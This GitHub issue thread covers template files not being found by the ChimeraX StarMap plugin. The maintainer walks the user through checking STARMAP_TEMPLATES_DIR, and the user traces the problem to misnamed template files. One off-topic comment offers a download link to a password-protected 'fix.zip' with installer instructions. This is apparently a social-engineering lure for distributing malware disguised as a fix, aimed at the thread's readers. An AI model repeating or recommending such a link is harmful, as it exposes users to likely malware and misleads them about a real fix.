### ISSUE TITLE
Cluster templates are not found even though files exist

### ISSUE THREAD

**Issue by kvr2007** [wlugmayr/chimerax-starmap#2]
Hello!

When I follow the instructions to submit the job to the cluster, I get the following error:

> Template file starmap_sbatch_mpi_3_13_cluster.tmpl.sh does not exist!

I checked `stmconfig` and the variable `STARMAP_TEMPLATES_DIR` points to a correct file location. What could be the issue here?

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wlugmayr** [comment]
Hi,

are you sure the access rights to the folder are ok?
The name of the template is a default template.
DId you override it?

Can you do:
$ ChimeraX -m chimerax.starmap.config | grep STARMAP_TEMPLATES_DIR
STARMAP_TEMPLATES_DIR       = /gpfs/cssb/software/templates/starmap
$ cat $STARMAP_TEMPLATES_DIR/starmap_sbatch_mpi_3_13_cluster.tmpl.sh

Does it print anything?

We renamed the templates like below and this is the selection shown in the StarMap GUI:
$ ls -1 $STARMAP_TEMPLATES_DIR                                   
desy_maxwell_rhel9_cluster.tmpl.sh
desy_maxwell_rhel9_ligand_cluster.tmpl.sh
localhost_nompi_ligand_local.tmpl.sh
localhost_nompi_local.tmpl.sh
starmap_medic.tmpl.sh

Do you see the changed names in the StarMap GUI?

**Comment by kvr2007** [comment]
Indeed, a different location was set to variable `STARMAP_TEMPLATES_DIR`:
```
$ chimerax -m chimerax.starmap.config | grep STARMAP_TEMPLATES_DIR
STARMAP_TEMPLATES_DIR       = /data/share/starmap_templates
```
The folder exists, and the new template files are there.

As it turned out, the new templates were not called `_cluster.tmpl.sh`, but rather `.tmpl.sh` and thus not found by StarMap.

**Comment by kvr2007** [comment]
Closed the issue, was a user error :)
